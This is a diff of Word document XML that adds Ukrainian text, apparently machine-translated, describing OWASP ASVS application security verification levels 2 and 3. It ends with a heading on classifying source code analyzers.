+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>або</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>стандарт</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>якщо</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>він</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>адекватно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>захищає</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>від</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>більшості</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ризиків</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>пов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>язаних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>з</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>програмним</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>забезпеченням</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>сьогодні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">використовується в додатку. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ASVS Рівень 3 є високий рівень контролю в межах рівня ASVS.This, як правило, зарезервовані для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті, які можуть бути знайдені в районах військових, охорони здор</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ов'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Застосування на ASVS 3-го рівня вимагає більш глибокого аналізу, архітектури, кодування і тестування, ніж всі інші рівні. Захищеної applicationis Modularized осмислено (для полегшення, наприклад, відмовостійкості, масштабованості і найбільше, рівні безпеки), і кожен модуль (розділених мережевим з'єднанням і / або фізичного примірника) піклується про своїх власних обов'язків безпеки (захист</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t> в глибину), які повинні бути належним чином documented.Responsibilities включають засоби керування для забезпечення конфіденційності (наприклад, шифрування), цілісність (наприклад, операції, перевірки вхідних даних), доступність</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>(Наприклад, обробка навантаження коректно), аутентифікацію (в тому числі між системами), безвідмовності, авторизацію і аудит (ведення журналу).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -4586,10 +5386,11 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -4598,436 +5399,622 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:br w:type="page"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Класифікація</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
